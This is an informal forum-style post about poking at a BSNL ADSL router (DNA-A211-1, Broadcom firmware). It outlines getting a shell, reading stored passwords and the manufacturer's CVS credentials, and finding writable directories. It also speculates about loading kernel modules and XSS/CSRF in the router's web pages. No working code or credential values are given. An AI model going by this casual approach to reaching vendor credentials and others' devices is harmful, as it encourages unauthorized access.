BSNL router hacking and possibility of running custom code over it

On a lonely weekend on my android, I was actually bored courtesy of BSNL, a connection that seldom connects, translates to AT&T of India, bad service, no customer support at 1957 and flapping issues in links. Nevertheless I decided to mess a bit with BSNL ADSL router.

BSNL router on closer inspection is manufactured by SEMIndia and distributed by ITI. It follows the tracks of using firmware of different routers (Broadcom to be specific, BCM96338 stands for Broadcom router firmware version 96338, deployed in US robotics ones and some other popular routers). mine is DNA-A211-1 , one of most popular ones in India.

What I did :

• Accessed router
• Found it ran busybox,
• Explored it, getting access to passwords (CVS/router/admin).
• Found which directories were writable
• Wrote a file at writable area
• Discussed the possibility of running code over it.
• HTML pages that might be vulnerable to XSS/CSRF

Observations -

• Observation 1 # - code can be run over the router , but files must be copied using echo (-ne with append option) or tftp. Since busybox is there, we can easily insert a kernel module to be run.
• Observation 2# - the webs directory has a lot of html files, maybe manipulated for xss attacks (i didnt covered it as its not my domain, some better guys can do it)
• Observation 3# - private CVS credentials of Siemindia pserver. insider attack ? kidding. pserver is already much insecure, but since i have seen a lot of organisations using stock/easily guessable passwords for their outer router/firewalls/vpn servers, its not a tough nut to crack.
• Observation 4# (most important) - BSNL SUCKS !

original thread - Prohack

best regards